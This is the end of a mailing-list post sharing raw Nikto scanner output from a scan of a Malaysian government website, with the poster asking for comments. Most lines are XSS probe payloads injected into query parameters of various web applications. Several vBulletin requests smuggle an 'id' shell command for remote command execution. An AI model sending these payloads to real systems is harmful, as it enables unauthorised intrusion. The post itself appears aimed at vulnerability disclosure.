Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2562: GET /SPHERA/login/sm_login_screen.php?error=
\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and
Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2562: GET /SPHERA/login/sm_login_screen.php?uid=
\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and
Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2617: GET /acart2_0/signin.asp?msg=<script>alert(\"test\")</
script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-2695: GET /photo/ : My Photo Gallery pre 3.6 contains multiple
vulnerabilities including .. traversal, unspecified vulnerabilities,
and remote management interface access.
+ OSVDB-2790: GET /index.php?vo=\"><script>alert(document.cookie);</
script> : Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2921: GET /shopping/shopdisplayproducts.asp?
id=1&cat=<script>alert('test')</script> : VP-ASP prior to 4.50 are
vulnerable to XSS attacks
+ OSVDB-3092: GET /archive/ : This might be interesting...
+ OSVDB-3092: GET /clients/ : This might be interesting...
+ OSVDB-3092: GET /directory/ : This might be interesting...
+ OSVDB-3092: GET /forum/ : This might be interesting...
+ OSVDB-3092: GET /home/ : This might be interesting...
+ OSVDB-3092: GET /mp3/ : This might be interesting...
+ OSVDB-3092: GET /new : This may be interesting...
+ OSVDB-3092: GET /new/ : This might be interesting...
+ OSVDB-3092: GET /news : This may be interesting...
+ OSVDB-17670: GET /vc30/ : Site Server sample files. This might be
interesting...
+ OSVDB-3093: GET /adv/gm001-mc/ : This might be interesting... has
been seen in web logs from an unknown scanner.
+ OSVDB-3233: GET /netbasic/websinfo.bas : Novell Netware 5.1 contains
Novonyx default files which reveal system information. All default
files should be removed.
+ OSVDB-3280: GET /forum/memberlist.php?
s=23c37cf1af5d2ad05f49361b0407ad9e&what=\">
\"<script>javascript:alert(document.cookie)</script> : Vbulletin 2.2.9
and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-3289: GET /firewall/policy/dlg?
q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz :
Fortigate firewall 2.50 and prior contains several CSS vulnerabilities
in various administrative pages.
+ OSVDB-3294: GET /firewall/policy/policy?
fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script> :
Fortigate firewall 2.50 and prior contains several CSS vulnerabilities
in various administrative pages.
+ OSVDB-3295: GET /antispam/listdel?
file=blacklist&name=b<script>alert('Vulnerable')</
script>&startline=0 : Fortigate firewall 2.50 and prior contains
several CSS vulnerabilities in various administrative pages.
+ OSVDB-3295: GET /antispam/listdel?
file=whitelist&name=a<script>alert('Vulnerable')</
script>&startline=0(naturally) : Fortigate firewall 2.50 and prior
contains several CSS vulnerabilities in various administrative pages.
+ OSVDB-3296: GET /theme1/selector?
button=status,monitor,session&button_url=/system/status/status,/system/
status/moniter\"><script>alert('Vulnerable')</script>,/system/status/
session : Fortigate firewall 2.50 and prior contains several CSS
vulnerabilities in various administrative pages.
+ OSVDB-3296: GET /theme1/selector?
button=status,monitor,session&button_url=/system/status/status
\"><script>alert('Vulnerable')</script>,/system/status/moniter,/system/
status/session : Fortigate firewall 2.50 and prior contains several
CSS vulnerabilities in various administrative pages.
+ OSVDB-3296: GET /theme1/selector?button=status,monitor,session
\"><script>alert('Vulnerable')</script>&button_url=/system/status/
status,/system/status/moniter,/system/status/session : Fortigate
firewall 2.50 and prior contains several CSS vulnerabilities in
various administrative pages.
+ OSVDB-3299: GET /forumscalendar.php?
calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo
%20%60id%20%60;die();echo%22 : Vbulletin allows remote command
execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: GET /forumzcalendar.php?
calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo
%20%60id%20%60;die();echo%22 : Vbulletin allows remote command
execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: GET /htforumcalendar.php?
calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo
%20%60id%20%60;die();echo%22 : Vbulletin allows remote command
execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: GET /vbcalendar.php?
calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo
%20%60id%20%60;die();echo%22 : Vbulletin allows remote command
execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: GET /vbulletincalendar.php?
calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo
%20%60id%20%60;die();echo%22 : Vbulletin allows remote command
execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3417: GET /examplesWebApp/InteractiveQuery.jsp?
person=<script>alert('Vulnerable')</script> : BEA WebLogic 8.1 and
below are vulnerable to Cross Site Scripting (XSS) in example code. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0624
. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3458: GET /sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</
script> : Ecometry's SGDynamo is vulnerable to Cross Site Scripting
(XSS). http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0375. http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-3486: GET /aktivate/cgi-bin/catgy.cgi?
key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</
script> : Aktivate Shopping Cart 1.03 and lower are vulnerable to
Cross Site Scripting (XSS). http://www.allen0keul.com/aktivate/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1212
, http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4262: GET /addressbook.php?\"><script>alert(Vulnerable)</
script><!-- : Squirrel Mail 1.2.7 is vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4265: GET /help.php?chapter=<script>alert('Vulnerable')</
script> : Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4356: GET /acart2_0/deliver.asp?msg=<script>alert(\"test\")</
script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-4357: GET /acart2_0/error.asp?msg=<script>alert(\"test\")</
script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-4358: GET /acart2_0/admin/error.asp?msg=<script>alert(\"test
\")</script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-4359: GET /acart2_0/admin/index.asp?msg=<script>alert(\"test
\")</script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-5097: GET /wwwping/index.stm?
wwwsite=<script>alert(document.cookie)</script> : Sambar Server
default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/create.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/edit.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/ftp.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/htaccess.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/iecreate.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/ieedit.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/info.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/mkdir.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/rename.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/search.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/sendmail.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/template.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/update.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/vccheckin.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/vccreate.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/vchist.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5099: GET /sysuser/docmgr/edit.stm?
name=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5099: GET /sysuser/docmgr/ieedit.stm?
name=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5099: GET /sysuser/docmgr/info.stm?
name=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5099: GET /sysuser/docmgr/rename.stm?
name=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5099: GET /sysuser/docmgr/sendmail.stm?
name=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5099: GET /sysuser/docmgr/update.stm?
name=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5099: GET /sysuser/docmgr/vccheckin.stm?
name=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5099: GET /sysuser/docmgr/vccreate.stm?
name=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5099: GET /sysuser/docmgr/vchist.stm?
name=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5102: GET /syshelp/stmex.stm?
foo=123&bar=<script>alert(document.cookie)</script> : Sambar Server
default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5103: GET /syshelp/cscript/showfunc.stm?
func=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5104: GET /syshelp/cscript/showfncs.stm?
pkg=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5105: GET /syshelp/cscript/showfnc.stm?
pkg=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5106: GET /netutils/ipdata.stm?
ipaddr=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5107: GET /netutils/findata.stm?
host=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5107: GET /netutils/findata.stm?
user=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5108: GET /sysuser/docmgr/search.stm?
query=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-701: GET /pls/dadname/htp.print?
cbuf=<script>alert('Vulnerable')</script> : Oracle 9iAS is vulnerable
to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-20954: GET /shopadmin.asp?Password=abc&UserName=
\"><script>alert(foo)</script> : VP-ASP Shopping Cart 5.50
shopadmin.asp UserName Variable XSS.
+ OSVDB-20406: GET /phpinfo.php?
GLOBALS[test]=<script>alert(document.cookie);</script> : PHP contains
a flaw that allows a remote cross site scripting attack.
+ OSVDB-24484: GET /phpinfo.php?
cx
[]=
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
<script>alert(foo)</script> : PHP 5.1.2 and 4.4.2 phpinfo() Function
Long Array XSS
+ OSVDB-35935: GET /rpc.php?q=\"><script>alert(document.cookie)</
script> : Unobtrusive Ajax Star Rating Bar is vulnerable to XSS in the
q variable.
+ 3577 items checked: 216 item(s) reported on remote host
+ End Time: 2009-09-05 1:09:01 (444 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Test Options: -h www.mardi.gov.my -output mardi.txt
---------------------------------------------------------------------------
Maybe someone might be share this result and give your comment about
this. Your comment are need and hope we can do something about it.
Thanks
Mohd Fazli Azran
PCBSD Malaysia
More information about the PCBSD-malaysia
mailing list